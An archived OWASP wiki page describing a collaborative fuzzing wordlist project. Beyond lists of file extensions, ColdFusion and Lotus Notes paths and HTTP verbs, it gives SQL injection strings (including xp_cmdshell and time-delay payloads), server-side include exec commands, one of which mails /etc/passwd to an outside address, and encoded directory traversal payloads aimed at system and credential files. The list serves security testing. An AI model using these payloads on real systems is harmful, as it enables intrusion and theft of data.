Category:OWASP Fuzzing Code Database

From OWASP
Revision as of 05:18, 17 March 2010 by Adam.muntner (Talk | contribs)

Jump to: navigation, search

This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like WebScarab, WebSlayer and JBroFuzz with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added.

News

02 February 2010'

  • Created new Category Lotus/Notes Files

11 August 2009

  • Created new Category: XML Attacks

Update Statements

  • 15 new XML Statements
  • 93 new SQL Injections Statements
  • 67 new Traversal Directory Statements
  • Delete 33 XSS Statement Duplicate
  • 30 New XSS Statements

7 August 2009

  • Updated the objectives of the project.

21 July 2009

  • Set the team responsible for the project.

Goals

This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP.

In addition, the following functionalities will be included on this project:

1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases

An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned:

1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database.

2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation.

3 - Possibility to support users on the report of their own experiences with the statements.

Statements

(Common Data File Extensions (Update: 16 March 2009 - Total Statements: 863)

.$er
.123
.1pe
.1ph
.3dr
.3dt
.3me
.3pe
.4dl
.4dv
.8xk
.^^^
.a3l
.a3m
.a3w
.a4l
.a4m
.a4w
.a5l
.a5w
.a65
.aao
.ab
.ab1
.ab2
.ab3
.abcd
.abi
.abp
.aby
.aca
.acc
.accdb
.acf
.acg
.ade
.adp
.adt
.adx
.aft
.agd
.aifb
.alc
.ald
.ali
.amb
.amsorm
.an1
.anme
.apr
.arc
.arh
.ask
.asm
.ast
.at5
.att
.aw
.awg
.azw
.bafl
.bci
.bcm
.bdf
.bdic
.bfx
.bgl
.bgt
.bin
.bjo
.bk
.bkk
.blb
.bld
.blg
.bok
.box
.brd
.brw
.btf
.btif
.btm
.btr
.cap
.cat
.cbg
.cch
.ccr
.cct
.cdb
.cdd
.cdf
.cdp
.cdr
.cdx
.cel
.celtx
.chg
.chk
.chn
.ckd
.ckt
.cl2
.cl4
.clb
.clix
.clm
.clp
.cmbl
.cna
.contact
.cpi
.cpmz
.crd
.crtx
.csa
.csv
.ctf
.ctt
.cursorfx
.curxptheme
.cvd
.cvn
.cwk
.cws
.cwz
.cxt
.cyo
.cys
.daf
.dal
.dam
.das
.dat
.data
.db
.db2
.db3
.dbc
.dbd
.dbf
.dbx
.dcf
.dcl
.dcm
.dcmd
.ddc
.ddcx
.ddt
.dem
.des
.dex
.dfm
.dfproj
.dft
.dgb
.dif
.dii
.dlg
.dm2
.dmo
.dmsk
.dnc
.dockzip
.dp1
.dpn
.dpx
.drl
.dsb
.dsd
.dsk
.dsy
.dsz
.dt0
.dt1
.dt2
.dta
.dtr
.dvdproj
.dvo
.dwi
.e00
.eap
.ebuild
.ec0
.eco
.ecx
.edb
.edf
.eep
.efx
.egp
.emb
.emd
.emlxpart
.enc
.enw
.epp
.epub
.epw
.er1
.esp
.ess
.est
.esx
.et
.eta
.etd
.etl
.ev
.ev3
.evt
.evy
.exif
.exp
.exx
.fa
.fasta
.fbl
.fcd
.fcs
.fdb
.ffd
.ffwp
.fhc
.fid
.fil
.flame
.fll
.flo
.flp
.flt
.fm
.fm5
.fmp
.fo
.fob
.fol
.fop
.fox
.fp
.fp3
.fp4
.fp5
.fp7
.frl
.frm
.fro
.frx
.fsb
.fsc
.ftm
.ftw
.gan
.gbr
.gc
.gcx
.gdb
.ged
.gedcom
.gen
.ggb
.gml
.gms
.gno
.gnp
.gp3
.gpi
.gps
.gpx
.gra
.grade
.grf
.grib
.grk
.grr
.grv
.gs
.gst
.gtp
.gwk
.gxl
.hcc
.hce
.hci
.hcp
.hcr
.hcu
.hda
.hdb
.hdf
.hdi
.hdl
.hif
.hl
.hml
.hmt
.hs2
.hsk
.hst
.htg
.huh
.hyv
.i5z
.ib
.ics
.id2
.idx
.igc
.ihx
.ii
.iif
.img
.imt
.ink
.inp
.ins
.ip
.irock
.irr
.irx
.isf
.itdb
.itl
.itm
.itn
.itw
.itx
.ivt
.iw
.ixb
.jasper
.jdb
.jef
.jmp
.jnt
.job
.joboptions
.joined
.jph
.jrprint
.jrxml
.jude
.kap
.kdb
.kid
.kismac
.kmz
.kpf
.kpp
.kpr
.kpx
.kpz
.l
.l6t
.laccdb
.lbl
.lbx
.lcd
.lcf
.lcm
.ldif
.lex
.lgc
.lgf
.lgh
.lgi
.lgl
.lib
.lif
.livereg
.liveupdate
.lix
.llb
.lms
.lmx
.lnt
.loc
.lp7
.lrf
.lrs
.lrx
.lsf
.lsl
.lsp
.lsr
.lst
.lsu
.lvm
.lw4
.ly
.m
.mag
.mai
.map
.masseffectprofile
.mat
.mbb
.mbf
.mbg
.mbl
.mbp
.mbx
.mc1
.mc9
.mcd
.md
.mdb
.mdc
.mdf
.mdl
.mdm
.mdn
.mdt
.mdx
.mdz
.mem
.menc
.met
.mex
.mfo
.mfp
.mgc
.mls
.mm
.mmap
.mmc
.mmf
.mmp
.mnc
.mng
.mnk
.mno
.mny
.mobi
.moho
.mosaic
.mox
.mpd
.mpj
.mpp
.mpt
.mpx
.mpz
.mq4
.ms10
.mth
.mtw
.mud
.muf
.mw
.mwf
.mws
.mwx
.mxd
.myd
.myi
.nb
.nc
.ndf
.ndk
.ndx
.net
.neta
.nfo
.nitf
.nmind
.not
.notebook
.np
.npl
.npt
.nrl
.ns2
.ns3
.ns4
.nsf
.ntx
.numbers
.nvl
.nyf
.oab
.obj
.odb
.odf
.odp
.ods
.odx
.oeaccount
.ofc
.ofm
.oft
.ofx
.omcs
.omp
.ond
.one
.oo3
.opf
.opx
.or2
.or3
.or4
.or5
.or6
.org
.orx
.otf
.otl
.otln
.ots
.out
.ov2
.ova
.ovf
.p96
.p97
.pab
.paf
.pan
.pbd
.pc
.pcap
.pcb
.pcr
.pd4
.pd5
.pdas
.pdb
.pdd
.pdm
.pds
.pdx
.peb
.pec
.pep
.pex
.pfc
.pfl
.phb
.phm
.pi
.pis
.pjx
.pka
.pkb
.pkh
.pks
.pkt
.pln
.plw
.pmo
.pmr
.pnproj
.pnpt
.pns
.pnt
.pod
.poi
.pos
.postal
.pot
.potm
.potx
.pp2
.ppf
.pps
.ppsx
.ppt
.pptm
.pptx
.prc
.pre
.prf
.prj
.prm
.prs
.psa
.psf
.psm
.pst
.ptb
.ptf
.ptk
.ptm
.ptn
.ptt
.ptz
.pvl
.pwd
.pxj
.pxl
.q07
.q08
.q09
.q3d
.qbw
.qdat
.qdf
.qdfm
.qel
.qfx
.qif
.qpb
.qpf
.qph
.qpm
.qpw
.qrp
.qsd
.ral
.rbt
.rcd
.rcg
.rdb
.rdf
.rdx
.ref
.ret
.rf1
.rfa
.rfo
.rge
.rgn
.rgo
.rmuf
.rnq
.rod
.rog
.roi
.rou
.rpp
.rpt
.rrt
.rsc
.rsd
.rsw
.rte
.rvt
.rwg
.rzb
.s85
.saf
.sam07
.sar
.sav
.sbd
.sbf
.sbq
.sbt
.sca
.scf
.sch
.sdb
.sdc
.sdf
.sdp
.sdq
.sds
.sen
.seo
.seq
.ser
.sgml
.sgn
.shp
.shs
.shx
.skc
.skv
.skx
.sle
.slk
.slp
.snapfireshow
.sonic
.soundpack
.spo
.sps
.spub
.spv
.sq
.sqd
.sql
.sqlite
.sqr
.sta
.stc
.stf
.stk
.stl
.stm
.stp
.str
.stt
.stw
.styk
.stykz
.swk
.sxc
.sxi
.sy3
.t01
.t02
.t03
.t04
.t05
.t06
.t07
.t08
.t09
.t2
.t3001
.tax2008
.tax2009
.tb
.tbk
.tbl
.tcc
.tcx
.tda
.tdl
.tdm
.tdt
.te
.te3
.teacher
.tef
.tet
.tfa
.tfd
.tfrd
.tjp
.tk3
.tkfl
.tmw
.tol
.topc
.tpb
.tps
.tr3
.tra
.trd
.trk
.trs
.trx
.tst
.tsv
.ttk
.txa
.txd
.txf
.uccapilog
.ud
.udb
.udeb
.uds
.ulf
.ulz
.update
.upoi
.usr
.uvf
.uwl
.val
.vbpf1
.vcd
.vce
.vcf
.vcs
.vdb
.vdx
.vfs
.vi
.vip
.vle
.vlg
.vmt
.voi
.vok
.vrd
.vscontent
.vsx
.vtx
.vxml
.w02
.wab
.wb1
.wb2
.wb3
.wdb
.wdq
.wea
.wfd
.wfm
.wgp
.wgt
.windowslivecontact
.wjr
.wk1
.wk2
.wk3
.wk4
.wk5
.wke
.wki
.wks
.wku
.wlmp
.wmdb
.wor
.wpc
.wpf
.wpo
.wq1
.wq2
.wtb
.wtr
.xbk
.xdb
.xdp
.xds
.xef
.xem
.xfd
.xfo
.xft
.xl
.xlc
.xlgc
.xlr
.xls
.xlsb
.xlsm
.xlsx
.xlt
.xltm
.xltx
.xlw
.xmcd
.xml
.xmlper
.xmpz
.xpg
.xpj
.xpm
.xpt
.xrp
.xsl
.xslt
.xsn
.xtm
.xtp
.xxd
.yam
.zap
.zdb
.zdc
.zix
.zmc
.zpl
.{pb
.~hm



(Compressed File Types - (Update: 16 March 2009 - Total Statements: 187)

.0
.000
.7z
.a00
.a01
.a02
.ace
.ain
.alz
.apz
.ar
.arc
.arh
.ari
.arj
.ark
.axx
.b64
.ba
.bh
.boo
.bz
.bz2
.bzip
.bzip2
.c00
.c01
.c02
.car
.cb7
.cbr
.cbt
.cbz
.cp9
.cpgz
.cpt
.dar
.dd
.deb
.dgc
.dist
.ecs
.efw
.epi
.f
.fdp
.gca
.gz
.gzi
.gzip
.ha
.hbc
.hbc2
.hbe
.hki
.hki1
.hki2
.hki3
.hpk
.hyp
.ice
.ipg
.ipk
.ish
.j
.jar.pack
.jgz
.jic
.kgb
.lbr
.lemon
.lha
.lnx
.lqr
.lz
.lzh
.lzm
.lzma
.lzo
.lzx
.md
.mint
.mou
.mpkg
.mzp
.oar
.p7m
.pack.gz
.package
.pae
.pak
.paq6
.paq7
.paq8
.par
.par2
.pbi
.pcv
.pea
.pet
.pf
.pim
.pit
.piz
.pkg
.pup
.puz
.pwa
.qda
.r0
.r00
.r01
.r02
.r03
.r1
.r2
.r30
.rar
.rev
.rk
.rnc
.rp9
.rpm
.rte
.rz
.rzs
.s00
.s01
.s02
.s7z
.sar
.sdc
.sdn
.sea
.sen
.sfs
.sfx
.sh
.shar
.shk
.shr
.sit
.sitx
.spt
.sqx
.sqz
.tar
.tar.gz
.tar.xz
.taz
.tbz
.tbz2
.tg
.tgz
.tlz
.tlzma
.txz
.tz
.uc2
.uha
.vem
.vsi
.wad
.war
.wot
.xef
.xez
.xmcdz
.xpi
.xx
.xz
.y
.yz
.z
.z01
.z02
.z03
.z04
.zap
.zfsendtotarget
.zip
.zipx
.zix
.zoo
.zpi
.zz

(Uncommon Data File Extensions (Update: 16 March 2009 - Total Statements: 284)

.3me
.3pe
.4dl
.8xk
.^^^
.aao
.ab2
.aca
.accdb
.acf
.acg
.agd
.an1
.anme
.arc
.arh
.ast
.att
.aw
.bafl
.bdf
.bfx
.bjo
.bld
.blg
.btf
.btif
.btr
.cct
.cdb
.cdd
.cdf
.cdp
.cdr
.chk
.ckd
.cl2
.cl4
.clb
.clix
.clm
.cmbl
.contact
.cpi
.cpmz
.csv
.cwz
.cxt
.daf
.dat
.data
.db
.dcf
.ddt
.dex
.dif
.dmsk
.dnc
.dpx
.dsd
.dt1
.dt2
.dta
.e00
.ec0
.edf
.eep
.efx
.enc
.enw
.epw
.est
.et
.eta
.ev3
.exif
.exp
.fbl
.fdb
.fid
.fol
.gdb
.gen
.gnp
.gpi
.gpx
.hcp
.hdf
.hmt
.hsk
.htg
.id2
.ii
.img
.ink
.ins
.irr
.irx
.iw
.jdb
.jnt
.job
.jrprint
.kmz
.lbx
.lex
.lgf
.lgl
.lib
.liveupdate
.lnt
.lst
.m
.masseffectprofile
.mat
.mbb
.mdb
.mem
.menc
.met
.mmf
.mng
.mpd
.mpp
.ms10
.muf
.mw
.mwf
.mwx
.nc
.ndx
.nfo
.not
.ns2
.ns3
.ns4
.ntx
.numbers
.ods
.oeaccount
.omcs
.or2
.or3
.or4
.or5
.orx
.out
.ov2
.ovf
.paf
.pbd
.pcr
.pdb
.pdx
.peb
.pec
.pfc
.pis
.pln
.pnpt
.pns
.pnt
.pos
.postal
.pps
.ppsx
.ppt
.pptm
.pptx
.pre
.prf
.psa
.psf
.pst
.ptz
.q07
.q3d
.qbw
.qdat
.qdf
.qfx
.qpf
.qpw
.qsd
.rcd
.rdx
.ref
.rmuf
.roi
.rrt
.rvt
.rwg
.saf
.sam07
.sbd
.sbf
.sbq
.sbt
.sdb
.sdc
.sdf
.sds
.ser
.sgn
.shs
.skc
.slk
.sonic
.soundpack
.spo
.sql
.stf
.stl
.stm
.sy3
.t08
.t09
.t2
.tax2009
.tdl
.tdt
.te
.teacher
.tmw
.tol
.trk
.trs
.trx
.tsv
.uccapilog
.ud
.udeb
.uds
.update
.uwl
.val
.vcf
.vdb
.vfs
.vip
.vle
.vlg
.vxml
.w02
.wab
.wb1
.wb3
.wdq
.wfd
.wfm
.windowslivecontact
.wk1
.wk2
.wk3
.wk4
.wk5
.wke
.wks
.wlmp
.wpc
.wpo
.wq1
.wq2
.wtr
.xbk
.xdb
.xds
.xfd
.xl
.xlgc
.xlr
.xls
.xlsx
.xltm
.xltx
.xml
.xmpz
.xsl
.xsn
.xtm
.xtp
.xxd
.{pb
.~hm

Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65)

CFIDE/Administrator/
CFIDE/Administrator/index.cfm
CFIDE/Administrator/login.cfm
CFIDE/Administrator/Application.cfm
CFIDE/Application.cfm
CFIDE/adminapi/
CFIDE/adminapi/Application.cfm
CFIDE/adminapi/administrator.cfc
CFIDE/adminapi/base.cfc
CFIDE/adminapi/customtags/
CFIDE/adminapi/customtags/l10n.cfm
CFIDE/adminapi/customtags/resources
CFIDE/adminapi/customtags/resources/
CFIDE/adminapi/datasource.cfc
CFIDE/adminapi/debugging.cfc
CFIDE/adminapi/eventgateway.cfc
CFIDE/adminapi/extensions.cfc
CFIDE/adminapi/mail.cfc
CFIDE/adminapi/runtime.cfc
CFIDE/adminapi/security.cfc
CFIDE/adminapi/_datasource/
CFIDE/adminapi/_datasource/formatjdbcurl.cfm
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm
CFIDE/adminapi/_datasource/geturldefaults.cfm
CFIDE/adminapi/_datasource/setdsn.cfm
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm
CFIDE/adminapi/_datasource/setsldatasource.cfm
CFIDE/classes/
CFIDE/classes/cf-j2re-win.cab
CFIDE/classes/cfapplets.jar
CFIDE/classes/images
CFIDE/componentutils/
CFIDE/componentutils/Application.cfm
CFIDE/componentutils/cfcexplorer.cfc
CFIDE/componentutils/cfcexplorer_utils.cfm
CFIDE/componentutils/componentdetail.cfm
CFIDE/componentutils/componentdoc.cfm
CFIDE/componentutils/componentlist.cfm
CFIDE/componentutils/gatewaymenu
CFIDE/componentutils/gatewaymenu/
CFIDE/componentutils/gatewaymenu/menu.cfc
CFIDE/componentutils/gatewaymenu/menunode.cfc
CFIDE/componentutils/login.cfm
CFIDE/componentutils/packagelist.cfm
CFIDE/componentutils/utils.cfc
CFIDE/componentutils/_component_cfcToHTML.cfm
CFIDE/componentutils/_component_cfcToMCDL.cfm?
CFIDE/componentutils/_component_style.cfm
CFIDE/componentutils/_component_utils.cfm
CFIDE/debug/
CFIDE/debug/images/
CFIDE/debug/includes/
CFIDE/images/
CFIDE/images/skins/
CFIDE/install.cfm
CFIDE/installers/
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp
CFIDE/installers/CFReportBuilderInstaller.exe
CFIDE/probe.cfm
CFIDE/scripts/
CFIDE/scripts/css/
CFIDE/scripts/xsl/
CFIDE/wizards/
CFIDE/wizards/common/
CFIDE/wizards/common/utils.cfc


All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)

OPTIONS
GET
HEAD
POST
PUT
DELETE
TRACE
CONNECT
PROPFIND
PROPPATCH
MKCOL
COPY
MOVE
LOCK
UNLOCK
VERSION-CONTROL
REPORT
CHECKOUT
CHECKIN
UNCHECKOUT
MKWORKSPACE
UPDATE
LABEL
MERGE
BASELINE-CONTROL
MKACTIVITY
ORDERPATCH
ACL
PATCH
SEARCH
ARBITRARY

Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)

/852566C90012664F
/admin4.nsf
/admin5.nsf
/admin.nsf
/agentrunner.nsf
/alog.nsf
/a_domlog.nsf
/bookmark.nsf
/busytime.nsf
/catalog.nsf
/certa.nsf
/certlog.nsf
/certsrv.nsf
/chatlog.nsf
/clbusy.nsf
/cldbdir.nsf
/clusta4.nsf
/collect4.nsf
/da.nsf
/dba4.nsf
/dclf.nsf
/DEASAppDesign.nsf
/DEASLog01.nsf
/DEASLog02.nsf
/DEASLog03.nsf
/DEASLog04.nsf
/DEASLog05.nsf
/DEASLog.nsf
/decsadm.nsf
/decslog.nsf
/DEESAdmin.nsf
/dirassist.nsf
/doladmin.nsf
/domadmin.nsf
/domcfg.nsf
/domguide.nsf
/domlog.nsf
/dspug.nsf
/events4.nsf
/events5.nsf
/events.nsf
/event.nsf
/homepage.nsf
/iNotes/Forms5.nsf/$DefaultNav
/jotter.nsf
/leiadm.nsf
/leilog.nsf
/leivlt.nsf
/log4a.nsf
/log.nsf
/l_domlog.nsf
/mab.nsf
/mail10.box
/mail1.box
/mail2.box
/mail3.box
/mail4.box
/mail5.box
/mail6.box
/mail7.box
/mail8.box
/mail9.box
/mail.box
/msdwda.nsf
/mtatbls.nsf
/mtstore.nsf
/names.nsf
/nntppost.nsf
/nntp/nd000001.nsf
/nntp/nd000002.nsf
/nntp/nd000003.nsf
/ntsync45.nsf
/perweb.nsf
/qpadmin.nsf
/quickplace/quickplace/main.nsf
/reports.nsf
/sample/siregw46.nsf
/schema50.nsf
/setupweb.nsf
/setup.nsf
/smbcfg.nsf
/smconf.nsf
/smency.nsf
/smhelp.nsf
/smmsg.nsf
/smquar.nsf
/smsolar.nsf
/smtime.nsf
/smtpibwq.nsf
/smtpobwq.nsf
/smtp.box
/smtp.nsf
/smvlog.nsf
/srvnam.htm
/statmail.nsf
/statrep.nsf
/stauths.nsf
/stautht.nsf
/stconfig.nsf
/stconf.nsf
/stdnaset.nsf
/stdomino.nsf
/stlog.nsf
/streg.nsf
/stsrc.nsf
/userreg.nsf
/vpuserinfo.nsf
/webadmin.nsf
/web.nsf
/.nsf/../winnt/win.ini
/?Open 

SQL Injection -(Update: 11 August 2009 - Total Statements: 126)

Statement
'sqlvuln
'+sqlvuln
sqlvuln;
(sqlvuln)
a' or 1=1--
"a"" or 1=1--"
 or a = a
a' or 'a' = 'a
1 or 1=1
a' waitfor delay '0:0:10'--
1 waitfor delay '0:0:10'--
declare @q nvarchar (4000) select @q =
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
0
031003000270000
declare @s varchar(22) select @s =
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
exec(@s)
a'
?
' or 1=1
‘ or 1=1 --
x' AND userid IS NULL; --
x' AND email IS NULL; --
anything' OR 'x'='x
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND members.email IS NULL; --
x' OR full_name LIKE '%Bob%
23 OR 1=1
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'
'%20or%20''='
'%20or%20'x'='x
%20or%20x=x
')%20or%20('x'='x
0 or 1=1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
 or 0=0 #"
or 0=0 #
' or 1=1--
" or 1=1--
' or '1'='1'--
' or 1 --'
or 1=1--
or%201=1
or%201=1 --
' or 1=1 or ''='
 or 1=1 or ""=
' or a=a--
 or a=a
') or ('a'='a
) or (a=a
hi or a=a
hi or 1=1 --"
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
"hi"") or (""a""=""a"
'hi' or 'x'='x';
@variable
,@variable
PRINT
PRINT @@variable
select
insert
as
or
procedure
limit
order by
asc
desc
delete
update
distinct
having
truncate
replace
like
handler
bfilename
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
exec xp
exec sp
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
\x27UNION SELECT
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
to_timestamp_tz
tz_offset
<>"'%;)(&+
'%20or%201=1
%27%20or%201=1
%20$(sleep%2050)
%20'sleep%2050'
char%4039%41%2b%40SELECT
&apos;%20OR
'sqlattempt1
(sqlattempt2)
|
%7C
*|
%2A%7C
*(|(mail=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28objectclass%3D%2A%29%29
(
%28
)
%29
&
%26
!
%21
' or 1=1 or ''='
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
a' or 3=3--
"a"" or 3=3--"
' or 3=3
‘ or 3=3 --

SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)

<!--#exec cmd="/bin/ls /" --><br/>
<!--#exec cmd="cat /etc/passwd" --><br/>
<!--#exec cmd="find / -name *.* -print" --><br/>
<!--#exec cmd="mail Foobar@email.de <mailto:Foobar@email.de> < cat /etc/passwd" --><br/>

Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)

Statement
\..\WINDOWS\win.ini
\..\..\WINDOWS\win.ini
\..\..\..\WINDOWS\win.ini
\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\WINDOWS\win.ini
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
../../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
../../../.htaccess
../../.htaccess
../.htaccess
.htaccess
././.htaccess
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%68%74%61%63%63%65%73%73
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
